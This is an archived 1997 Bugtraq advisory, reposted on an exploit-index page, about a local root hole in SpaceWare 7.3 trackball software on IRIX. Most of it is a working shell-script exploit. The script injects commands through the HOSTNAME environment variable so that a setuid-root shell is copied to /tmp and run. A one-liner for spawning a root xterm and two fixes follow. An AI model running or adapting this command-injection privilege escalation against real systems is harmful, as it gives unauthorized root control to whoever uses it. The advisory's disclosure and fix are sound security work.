root bug in spaceware

Summary
Description:Root hole in SpaceWare trackball software
Author:"J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: root (local)
Vulnerable Systems:Presumably any system running spaceware 7.3 v1.0 (probably earlier). I don't know if it is IRIX specific. From the message it sounds like there are likely other holes in the program.
Date:20 August 1997
Details


Date: Wed, 20 Aug 1997 15:53:31 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: SpaceWare 7.3 v1.0

        Hello

        I guess anyone who's reading this already have noticed (if
        you are playing with a SpaceBall), anyway here it goes:


===========================================================================
#!/bin/sh

SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh

echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1

/tmp/sh
===========================================================================

        more information:

        IRIX 6.2
        spaceware 7.3 v1.0 (http://www.spacetec.com/)
        ftp://ftp.spacetec.com/put/spaceball2003and3003/drivers/app.irix.7_3.tar

        (Obviously, you can use HOSTNAME for any command you want
        to run as root, like
echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball
        )

        Fix:

        a) rm (since spaceball.sh does lots of nasty things, like
        running spaceball demos as root, probably this is the best
        solution)

        b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
        $SWDIR/spaceball.sh



--
    J.A. Gutierrez
    finger me for PGP

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: